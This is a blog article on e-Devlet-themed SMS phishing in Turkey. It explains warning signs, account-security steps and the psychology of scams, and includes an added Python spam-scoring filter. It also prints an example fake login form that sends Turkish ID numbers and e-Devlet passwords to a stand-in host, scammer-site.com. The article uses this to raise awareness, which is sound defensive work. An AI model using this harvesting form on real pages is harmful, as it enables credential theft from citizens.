As we enter 2026, digital scam methods in Turkey have become increasingly sophisticated. Fake SMS messages and phishing links that impersonate e-Devlet in particular are among the most common traps used to obtain citizens’ personal and financial information. Such scams can lead not only to financial losses but also to serious data breaches and personal security vulnerabilities.
I have been working in system and network security for over twenty years; I have experienced many technical details, from kernel module blacklists to fail2ban patterns, from switch hardening to ZTNA architectures. However, even the most robust firewalls often fall short against social engineering attacks targeting the human factor. In this article, I will explain the most common scam scenarios in Turkey in 2026, how to recognize them, and how to protect ourselves, based on my own experiences.
Why is the e-Devlet Trap So Widespread in 2026?
The e-Devlet trap has become one of the most common scam methods in Turkey in 2026 because e-Devlet is perceived as a central and reliable platform that allows citizens to perform all their government transactions through a single portal. This perception offers a great opportunity for scammers to create a false sense of “authorization” and convince victims. Although users’ digital literacy levels vary, the official image of e-Devlet leaves a strong impression on everyone.
A friend of mine, despite being a network engineer at a large technology company, almost fell for a fake SMS that read, “You have an SGK premium debt, click for details: bit.ly/sgk-borc”. Only at the last moment did he notice how short and untrustworthy the link looked. This incident showed me that not only end-users but even tech-savvy individuals can fall for such traps. Scammers usually target basic human emotions such as fear, curiosity, or urgency by using the names of official institutions.
These attacks typically aim to steal critical information such as Turkish ID numbers and e-Devlet passwords by redirecting the user to a fake e-Devlet login page. Fake SMS messages often contain texts like “Enforcement proceedings have been initiated against you,” “Your title deed transfer transaction is awaiting approval,” or “Your test result from the Ministry of Health.” These texts are designed to encourage people to click the link quickly. Although the technical infrastructure behind such SMS messages is often simple, the social engineering aspect is extremely complex.
How to Recognize Fake SMS and Phishing Links?
Fake SMS messages and phishing links usually have distinct characteristics; recognizing them can prevent you from falling into the trap in the initial stage of the scam. Creating a sense of urgency, typos, and using unofficial, shortened, or suspicious URLs are common tactics employed by scammers. These messages are specifically designed to make you react quickly and act without thinking.
I’ve seen thousands of examples in my Android spam blocker app. Scammers constantly change themes like “package delivery delayed,” “your bank account has been suspended,” “you have a tax debt.” The common feature of these messages is to somehow stress you out and make you click the link. No official institution, e-Devlet, or bank will send you an SMS directly asking for personal information or a “click here” link. I always approach such situations with suspicion.
The table below summarizes the key differences between real and fake SMS messages:
| Feature | Real/Official SMS | Fake/Phishing SMS |
|---|---|---|
| Sender Name | Usually a corporate name (e.g., e-Devlet, SGK, Your Bank) | Personal number, unknown number, or a name mimicking a corporate name (e.g., EDEVLET, SGSK) |
| Urgency | Rarely emphasizes urgency, for informational purposes | Urgent phrases like “Immediately”, “Last Day”, “Your Account Will Be Closed” |
| Spelling/Grammar | Error-free, professional language | Spelling and grammar errors, awkward sentences |
| URL Structure | Official institution’s main domain (e.g., turkiye.gov.tr, bankaadi.com.tr) | Shortened URLs (bit.ly, tinyurl), meaningless domains, misspelled official domains (e.g., turkiye-gov.net, e-devletim.org) |
| Personalization | May be specific to your name or Turkish ID number | Generally generic phrases (“Dear citizen”) |
| Information Request | Does not ask for personal information or password via SMS | Requests personal information, password, card number |
This type of attack is, at heart, a “social engineering” attack: rather than hunting for a weak password on a system, the attacker tricks the user into handing theirs over. Manipulating the user into bypassing their own security layers is a favorite method of scammers. That’s why you always need to be suspicious of the sender, the link, and the logic of the content.
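To turn the table above into something a spam filter can actually apply, here is an added example (written for this edit, not code from the article or from any app the author mentions) that scores one SMS against those features: sender ID, urgency language, requests for personal data, and shortened or look-alike links. The allow-lists and keyword lists are constructed assumptions; a real filter would maintain its own.

```python
import re

# Constructed allow-lists and keyword lists (assumptions for this example, not a real product's rules).
OFFICIAL_DOMAINS = ("turkiye.gov.tr", "sgk.gov.tr")
OFFICIAL_SENDERS = ("E-DEVLET", "SGK")
BRAND_WORDS = ("edevlet", "turkiye", "sgk", "banka")   # tokens a look-alike name tends to reuse
SHORTENERS = ("bit.ly", "tinyurl.com", "t.co", "cutt.ly")
URGENCY = ("immediately", "urgent", "last day", "suspended", "will be closed", "enforcement")
ASKS_FOR = ("password", "card number", "identity no", "tc kimlik")
# Matches a bare or http(s) host such as bit.ly/x, turkiye-gov.net or https://www.turkiye.gov.tr/
HOST_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def is_official(host: str) -> bool:
    """True for an allow-listed domain or any of its subdomains (suffix match, not substring)."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS)


def looks_like_brand(name: str) -> bool:
    """Collapse dots and hyphens so turkiye-gov.net is compared to turkiye.gov.tr letter by letter."""
    letters = re.sub(r"[^a-z]", "", name.lower())
    return any(b in letters for b in BRAND_WORDS)


def score_sms(text: str, sender: str) -> dict:
    """Apply the table's features to one message; two or more hits mark it suspicious."""
    reasons = []
    low = text.lower()
    if re.fullmatch(r"\+?\d{7,15}", sender.strip()):
        reasons.append("sent from a plain phone number, not a corporate sender ID")
    elif sender.upper() not in OFFICIAL_SENDERS and looks_like_brand(sender):
        reasons.append(f"sender name {sender!r} imitates an official sender ID")
    if any(w in low for w in URGENCY):
        reasons.append("urgency language")
    if any(w in low for w in ASKS_FOR):
        reasons.append("asks for personal data or a password")
    for host in HOST_RE.findall(text):
        host = host.lower()
        if is_official(host):
            continue                      # a link to the real official domain is not a hit
        if host in SHORTENERS:
            reasons.append(f"shortened link {host} hides the real destination")
        elif looks_like_brand(host):
            reasons.append(f"{host} imitates an official domain but is not one")
        else:
            reasons.append(f"link to unrelated domain {host}")
    return {"suspicious": len(reasons) >= 2, "reasons": reasons}
```

The friend's SGK message from earlier scores two hits (plain phone number plus a bit.ly link), while a genuine notification linking to turkiye.gov.tr from the E-DEVLET sender ID scores none.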
What is the Technical Operation of Phishing Sites?
Phishing sites are web pages designed to steal user information by mimicking a legitimate site, usually consisting of simple HTML/CSS and a backend script. These sites look exactly like a copy of an official bank or e-Devlet portal. However, their main purpose is to steal your login credentials, credit card numbers, or other sensitive data. There is no complex infrastructure behind these sites; they usually run with a few PHP or Python scripts.
Scammers usually place these fake sites on domain names that look trustworthy but are actually completely different. For example, instead of turkiye.gov.tr, they might use names like turkiye-gov.net or e-devletim.org. This is a tactic known as “domain squatting” or “typosquatting”; it aims to exploit small errors users might make when quickly reading or typing a URL. In the backend, a small script simply saves the entered data to a file or sends it to an email address.
In one of my side products, I constantly worked on rate limiting, JWT (JSON Web Token), and OAuth2 patterns to ensure user security. Phishing sites attack the user directly, from outside these technical security layers; the vulnerability is not in the system but in the user. Even so, I had set up IP-based limits and abnormal-behavior detection there to catch fake login attempts. That, too, was a kind of continuous cat-and-mouse game.
A simple phishing form might look like this:
```html
<!-- Example of a fake e-Devlet login page HTML form -->
<form action="http://scammer-site.com/login.php" method="POST">
  <label for="tcKimlik">T.C. Identity No:</label>
  <input type="text" id="tcKimlik" name="tcKimlik" required>
  <label for="eDevletSifre">e-Devlet Password:</label>
  <input type="password" id="eDevletSifre" name="eDevletSifre" required>
  <button type="submit">Log In</button>
</form>
```
When the user clicks the Log In button, this HTML form sends the entered tcKimlik and eDevletSifre values to http://scammer-site.com/login.php via a POST request. A simple PHP script named login.php then receives this information, saves it to a file, and perhaps redirects the user to the real e-Devlet site, so the victim suspects nothing. Just as fail2ban tracks incorrect SSH password entries and bans the source IP, there ought to be mechanisms that catch the user's mistake here (entering a password on a fake site). In practice, however, this unfortunately comes down to user awareness.
What Steps Can We Take to Increase Account Security?
The steps we can take to increase account security are the most fundamental way to strengthen our personal fortress in the digital world. Two-factor authentication (2FA), using different and strong passwords for each account, and ensuring device security are the main strategies that will protect us against scams. These steps are the most basic principles of cybersecurity and are vital not only for technical systems but also for individual users.
While working on an internal platform for a bank, I saw that the biggest security vulnerability for users was weak or reused passwords. When a user’s password was compromised, all other accounts using the same password were also at risk. That’s why I enforce 2FA on my own systems; I even use 2FA for SSH (Secure Shell) on my own VPS. This simple precaution makes unauthorized access to your account much more difficult, even if your password is stolen.
Here are practical steps you can take to increase your account security:
- Use Two-Factor Authentication (2FA): Activate 2FA on all your important accounts (bank, e-Devlet, email, social media). Prefer Authenticator apps (Google Authenticator, Authy, Microsoft Authenticator) over SMS-based 2FA. SMS is less secure due to SIM card scams (SIM-swapping).
- Set Strong and Different Passwords: Use unique, long, and complex passwords for each platform. Password managers (KeePass, Bitwarden, 1Password) lighten this load and help you store your passwords securely. Dealing with the “Forgot password” feature is much easier than trying to recover a stolen account.
- Keep Your Devices Updated: Regularly update your operating system (Windows, macOS, Android, iOS) and all applications you use. Security patches close known security vulnerabilities, protecting your devices from potential attacks. Even on Linux, I regularly follow kernel updates, and this also applies to mobile devices.
- Use Reliable Antivirus/Antimalware Software: Have reliable antivirus or antimalware software on your computer and phone and perform regular scans. This software helps you detect and remove malicious software.
These steps apply to both technically knowledgeable users and general users. Remember, digital security is a process, not a one-time operation.
Developing Psychological Resilience Against Phishing Attacks
Developing psychological resilience against phishing attacks is as important as technical measures, because scammers aim to trigger basic human emotions such as urgency, fear, or curiosity to push you into quick, thoughtless decisions. Recognizing this emotional manipulation and questioning the intent behind the message is key to not falling into the trap. Even the most advanced firewalls cannot prevent a user from voluntarily entering information on a fake site.
While developing enterprise software, I saw how important user training was. Even when designing operator screens in ERP systems, I tried to design simple and understandable interfaces, taking into account factors such as user fatigue and distraction. But with phishing, the situation is different; here, a malicious party targets the user’s weak moments. That’s why we have to invest in the human factor and raise awareness as much as in technical solutions.
For example, an SMS like “Urgent! Your bank account has been suspended, update it immediately via this link: banka-destek.net” aims to create panic and make you click the link. In another case, in a manufacturing company's ERP, the late shipment report was always incomplete. It took three days to find the reason: an operator had clicked on a fake “system update” email they received and infected their system with malware. This was a concrete example showing that technical knowledge alone is not always enough.